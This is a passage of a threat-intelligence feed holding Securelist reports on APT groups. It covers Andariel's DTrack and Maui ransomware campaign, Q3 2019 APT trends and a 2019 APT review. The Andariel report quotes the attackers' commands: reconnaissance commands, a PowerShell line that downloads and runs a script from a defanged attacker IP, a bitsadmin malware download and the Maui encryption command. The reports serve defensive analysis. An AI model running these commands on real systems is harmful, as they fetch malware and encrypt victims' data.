maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, &quot;[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>),&quot; related to a Stairwell report, &quot;[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>).&quot; Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their &quot;first seen&quot; date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using &quot;-t&quot; and &quot;\\- x&quot; arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, &quot;-t 8&quot; sets the ransomware thread count to eight, &quot;-x&quot; commands the malware to &quot;self melt&quot;, and the &quot;E:&quot; value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe [&quot;3Proxy&quot; tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and &quot;whoami&quot; was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as &quot;Backdoor.Preft&quot; malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as &quot;aka Dtrack, Valefor&quot;. Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor&#x27;s TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-11T13:21:36", "description": "\n\nWhat were the most interesting developments in terms of APT activity during the year and what can we learn from them?\n\nThis is not an easy question to answer, because researchers have only partial visibility and it\u00b4s impossible to fully understand the motivation for some attacks or the developments behind them. However, let\u00b4s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.\n\n## Compromising supply chains\n\nTargeting supply chains has proved very successful for attackers in recent years \u2013 high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.\n\nIn January, we discovered a sophisticated supply-chain attack involving a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).\n\n## Disinformation\n\nQ3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\" for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale \"highly confidential\" information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.\n\n## Lost in Translation and Dark Universe\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system \u2013 for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.\n\nIn 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.\n\nThe main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\n## Mobile attacks\n\nMobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.\n\nIn May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people's chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit \u2013 and that seemed to be that. However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.\n\nIn July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.\n\nIn August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits \u2013 possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received \"thousands of visitors per week\". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.\n\nIn September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS \u2013 the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.\n\n## Established threat actors continue to revamp their tools\n\nWhile investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.\n\nThis year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.\n\nWe also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a.pdb path left in some of the samples. We believe the same COMPfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the 'client random' sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.\n\nZebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum \u2013 one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.\n\nOne of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly.\n\nIn Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but 